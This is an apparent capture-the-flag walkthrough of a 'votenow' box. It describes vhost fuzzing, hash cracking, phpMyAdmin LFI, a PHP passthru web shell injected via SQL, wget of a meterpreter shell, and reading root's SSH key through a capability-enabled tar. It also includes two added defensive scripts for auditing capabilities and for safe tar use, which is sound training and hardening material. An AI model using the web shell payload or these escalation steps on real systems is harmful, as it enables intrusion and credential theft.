**Just a heads up, I was able to import into VMware Workstation without an issue.**
1. First, I did an nmap scan to find the CTF box’s IP address. Once discovered, I did an nmap scan for available service ports.
2. We have two open ports, 2082 and 80. Port 2082 was an SSH service and port 80 was a running Apache service.
3. We run a dirb scan against port 80 for directory enumeration.
4. We also need to observe and enumerate the web pages. I did this using Burp. Honestly, I did not find much for a while. I took note of the domain votenow.local and added it to my hosts file. However, I was presented with the same information.
5. This is where I asked the author of the CTF for a clue. He mentioned there may be a hidden subdomain and a backup file that could help get me a foothold on the box. I never thought of virtual hosts for the box. I went straight to wfuzz:
wfuzz -c -w /opt/DirBuster/directory-list-2.3-small.txt --hl 282 --hc 400,403,404 -H "Host: FUZZ.votenow.local" -t 100 http://votenow.local
This is where I found datasafe as a possible subdomain. Time to add it to the hosts file.
6. This is where I scanned the hidden subdomain for all kinds of possible backup files. Nothing. Well, interesting anyway.
7. What am I missing? There must be a backup file somewhere. I bet it is something simple too. Arrghhh.
8. Ok, clue number 2. The author suggested maybe trying the main domain. Of course, I missed that, and it has CREDS!!
9. I was able to get in. Then, I checked out the Metasploit module to see if it was exploitable: https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce
10. It did not work. Seems like it should have worked. Oh well, let’s check around.
11. So I see the users table. I see there is a hash for the admin’s user account. That is all I see but hopefully I can use it somehow.
* Used the hash from the users table in the web app.
* hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
12. So we have a username and password. I was not able to use it to log in or get different access to the phpMyAdmin app. Then I checked the phpMyAdmin version again and looked for vulns:
13. I can exploit the LFI vuln using the database. I was able to view the PHP config with phpinfo(). It took a minute to find the exact directory location for my session, but I eventually found it.
14. Now, let’s see if we can get a web shell in: select "<?php passthru($_GET ['cmd']);exit;?>"
16. It worked. We now know that the process is running as apache instead of root.
17. We should be able to get a better web shell in there. We just need to host a page and get our small web shell to request the better one.
18. With a wget, we were able to request it and rename it. We are able to go to the page and now we have our meterpreter web shell working:
19. I looked around for processes running as root. I also looked for anything in the home directories. There was only the admin dir. It had two weird text files, user.txt and notes.txt. I also noted the version of the OS: Linux votenow.local 3.10.0-1127.13.1.el7.x86_64 #1 SMP.
[admin@votenow ~]$ cat notes.txt
1) Utilise new commands to backup and compress sensitive files
[admin@votenow ~]$ cat user.txt
20. I was stuck here. Uploaded the LinEnum.sh file. Looked for sticky bit files, more weird processes, etc. Found nothing. Clue number 3: Look up Linux ‘capabilities’ and you will find a file that will help.
21. After reading about this, I now understood the clues from the text files in the admin folder. Additional reading:
22. So I identified the tarS executable that could copy the shadow file and allow us to read it. I tried to crack it but no dice. I even thought I could possibly rewrite it and add my own hash to it. Nope.
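The clue above is about Linux file capabilities: a binary carrying something like cap_dac_read_search can read any file on the box for whoever is allowed to execute it, which is exactly the kind of "helpful" backup tool a hardening review should catch before a CTF player does. The following audit helper is an added example and not part of the original write-up; the sample getcap output, paths and capability sets in it are constructed (the write-up does not say which capability tarS actually carried), and it accepts both the older "path = caps+ep" and the newer "path caps=ep" getcap formats.

```shell
#!/bin/sh
# Audit of Linux file capabilities from the defender's side: given the output of
# `getcap -r / 2>/dev/null`, report binaries whose capability set lets a caller
# bypass file permissions, change identity or otherwise reach root-equivalent
# power. A backup tool with cap_dac_read_search can read /etc/shadow for anyone
# who can run it.
#
# Run against a live host:   getcap -r / 2>/dev/null | flag_dangerous_caps

# Capabilities that need an explicit justification on any executable.
DANGEROUS_CAPS='cap_dac_read_search|cap_dac_override|cap_setuid|cap_setgid|cap_sys_admin|cap_sys_ptrace|cap_chown|cap_fowner|cap_sys_module'

# Constructed sample of getcap output covering both the older "path = caps+ep"
# and the newer "path caps=ep" formats. Paths and capability sets are invented
# for this example and are not taken from the CTF box.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/local/bin/backup-tar = cap_dac_read_search+ep
/usr/sbin/arping cap_net_raw=ep
/opt/tools/dumper cap_setuid,cap_sys_admin=eip'

# flag_dangerous_caps: reads getcap lines on stdin and prints "path caps" for
# every binary whose set contains one of DANGEROUS_CAPS. The sed normalises the
# older " = " separator so both formats come out the same way.
flag_dangerous_caps() {
    grep -E "(^|[ ,=])(${DANGEROUS_CAPS})([ ,+=]|$)" |
        sed -E 's/^([^ ]+) = (.*)$/\1 \2/'
}

# count_flagged: number of flagged binaries in the sample, for a quick summary.
count_flagged() {
    printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps | grep -c .
}

printf 'Binaries with capabilities that need review:\n'
printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
```

cap_net_raw on ping and arping is the normal, packaged use of file capabilities and is left alone; the two flagged entries are the ones an administrator should be able to explain or remove with `setcap -r`.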
23. I remembered the --checkpoint exploit (wildcard injection). I had it in my notes from the OSCP or a previous CTF, but it was worth checking out. I tried writing a bash script that could possibly escalate my privileges. Noooooope. Wait, it allowed me to read the shadow file. What about reading root’s ssh files??!!
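The wildcard problem mentioned above comes from the shell, not from tar: when a privileged backup job runs something like `tar cf backup.tar *`, the glob is expanded into file names and tar parses those names as arguments, so a file whose name starts with a dash is read as an option. The script below is an added example, not code from the write-up or the CTF box; it builds a constructed directory containing a file named after a harmless tar option (--totals, chosen only to make the misparse visible), archives it with the unsafe pattern and with a form that never lets a glob reach tar, and shows the difference in the archive listings. It assumes GNU tar.

```shell
#!/bin/sh
# Why "tar cf backup.tar *" in a privileged backup job is unsafe, beside a form
# that does not have the problem. The shell expands the glob into file names and
# tar parses those names as arguments, so a file whose name begins with "-" is
# read as an option. The file created here is named after a harmless option
# (--totals) purely to make the misparse visible; it is a constructed example.

# make_sample_dir: builds a directory holding a normal file and a file whose
# name looks like a tar option, and prints the directory path.
make_sample_dir() {
    d=$(mktemp -d)
    printf 'ordinary content\n' > "$d/data.txt"
    printf 'also ordinary content\n' > "$d/--totals"   # constructed file name
    printf '%s\n' "$d"
}

# unsafe_backup DIR OUT: the typical one-liner. After glob expansion tar sees
# "--totals" as an option and archives only data.txt.
unsafe_backup() {
    ( cd "$1" && tar -cf "$2" * ) 2>/dev/null
}

# safe_backup DIR OUT: no glob reaches tar. -C selects the directory, "--" ends
# option parsing and "." names its contents, so every entry is stored as data
# whatever it is called. (With find, the equivalent is
# find DIR -print0 | tar --null -T - -cf OUT, where --null also disables
# option handling of names read from the list.)
safe_backup() {
    tar -cf "$2" -C "$1" -- .
}

# archive_has OUT NAME: succeeds if the archive lists an entry ending in NAME.
archive_has() {
    tar -tf "$1" | grep -q -- "$2\$"
}

SAMPLE_DIR=$(make_sample_dir)
unsafe_backup "$SAMPLE_DIR" "$SAMPLE_DIR.unsafe.tar"
safe_backup   "$SAMPLE_DIR" "$SAMPLE_DIR.safe.tar"
printf 'unsafe archive contents:\n'; tar -tf "$SAMPLE_DIR.unsafe.tar"
printf 'safe archive contents:\n';   tar -tf "$SAMPLE_DIR.safe.tar"
```

The unsafe listing silently lacks the oddly named file because tar consumed its name as an option; the same mechanism is what lets a writable directory turn a root cron job into code execution. The fix is the same in every backup script: pass a fixed directory operand or a null-separated file list, never an expanded glob.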
24. I see the ssh_id file and we have the ssh port. Hopefully, it is not password protected. We are in.
25. I had to thank the author for a great CTF. It was challenging and yet another reminder, keep reading and learning.